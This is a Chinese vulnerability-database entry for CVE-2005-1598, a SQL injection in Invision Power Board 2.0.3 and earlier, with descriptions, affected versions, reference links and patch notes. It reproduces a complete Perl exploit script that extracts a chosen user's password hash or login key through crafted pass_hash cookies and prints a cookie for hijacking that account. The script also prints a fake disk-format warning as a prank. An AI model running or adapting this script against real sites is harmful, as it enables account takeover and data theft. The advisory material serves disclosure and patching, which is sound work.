CVE-2005-1598
CVSS7.5
发布时间 :2005-05-16 00:00:00
修订时间 :2016-10-17 23:21:11
NMCOE    

[原文]SQL injection vulnerability in Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via a crafted cookie password hash (pass_hash) that modifies the internal $pid variable.


[CNNVD]Invision Power Board Login.PHP SQL注入漏洞(CNNVD-200505-1037)

        Invision Power Board (IPB) 2.0.3及更早版本中存在SQL注入漏洞,远程攻击者可以通过一个修改内部$pid变量的特制的cookie密码哈希(pass_hash) 来执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:invision_power_services:invision_board:1.0
cpe:/a:invision_power_services:invision_board:1.1.2
cpe:/a:invision_power_services:invision_board:1.3
cpe:/a:invision_power_services:invision_board:1.2
cpe:/a:invision_power_services:invision_power_board:2.0.3
cpe:/a:invision_power_services:invision_board:2.0_pdr3
cpe:/a:invision_power_services:invision_board:2.0_alpha_3
cpe:/a:invision_power_services:invision_board:1.0.1
cpe:/a:invision_power_services:invision_board:1.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1598
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1598
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1037
(官方数据源) CNNVD

- 其它链接及资源

http://forums.invisionpower.com/index.php?showtopic=168016
(PATCH)  CONFIRM  http://forums.invisionpower.com/index.php?showtopic=168016
http://marc.info/?l=bugtraq&m=111539908705851&w=2
(UNKNOWN)  BUGTRAQ  20050506 Multiple Vulnerabilities In Invision Power Board
http://marc.info/?l=bugtraq&m=111712587206834&w=2
(UNKNOWN)  BUGTRAQ  20050526 Invision Power Board 1.* and 2.* Exploit (BID 13529)
http://milw0rm.com/exploits/1013
(UNKNOWN)  MILW0RM  1013
http://securitytracker.com/id?1013907
(UNKNOWN)  SECTRACK  1013907
http://securitytracker.com/id?1014499
(UNKNOWN)  SECTRACK  1014499
http://www.gulftech.org/?node=research&article_id=00073-05052005
(PATCH)  MISC  http://www.gulftech.org/?node=research&article_id=00073-05052005
http://www.securiteam.com/exploits/5GP0E2KFQQ.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5GP0E2KFQQ.html
http://www.securityfocus.com/bid/13529
(UNKNOWN)  BID  13529
http://xforce.iss.net/xforce/xfdb/20446
(UNKNOWN)  XF  invision-powerboard-login-sql-injection(20446)

- 漏洞信息

Invision Power Board Login.PHP SQL注入漏洞
高危 SQL注入
2005-05-16 00:00:00 2005-10-20 00:00:00
远程  
        Invision Power Board (IPB) 2.0.3及更早版本中存在SQL注入漏洞,远程攻击者可以通过一个修改内部$pid变量的特制的cookie密码哈希(pass_hash) 来执行任意SQL命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Invision Power Services Invision Board 1.0
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.0.1
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.1.1
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.1.2
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.2
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.3
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.3 Final
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.3
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 1.3.1 Final
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0 PDR3
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0 PF1
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0 PF2
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0 Alpha 3
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0.1
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0.2
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        Invision Power Services Invision Board 2.0.3
        Invision Power Services Invision Power Board 2.0.4
        http://www.invisionboard.com/act.ips/download
        

- 漏洞信息 (1013)

Invision Power Board <= 2.0.3 Login.PHP SQL Injection Exploit (EDBID:1013)
php webapps
2005-05-26 Verified
0 Petey Beege
N/A [点击下载]
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1];   # userid to jack
my $iver = $ARGV[2];   # version 1 or 2
my $cpre = $ARGV[3];   # cookie prefix
my $dbug = $ARGV[4];   # debug?

if (!$ARGV[2])
{
        print "The type of the file system is NTFS.\n\n";
        print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";
        print "DRIVE C: WILL BE LOST!\n";
        print "Proceed with Format (Y/N)?\n";
        exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
        for( $j=0; $j < 16; $j++ )
        {
                my $current = $charset[$j];
            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
                my $res = $ua->get($path, @cookie);

                # If we get a valid sql request then this
                # does not appear anywhere in the sources
                $pattern = '<title>(.*)Log In(.*)</title>';

                $_ = $res->content;

                if ($dbug) { print };

                if ( !(/$pattern/) )
                {
                        $outputs .= $current;
                        print "$current\n";
                    last;
                }

        }
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# milw0rm.com [2005-05-26]
		

- 漏洞信息

16297
Invision Power Board login.php SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Invision Power Board contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. This flaw exists because the 'login.php' script does not validate user-supplied input in certain login methods and may allow a remote attacker to inject or manipulate SQL queries.

- 时间线

2005-05-05 Unknow
2005-05-18 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Invision Power Services, Inc. has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站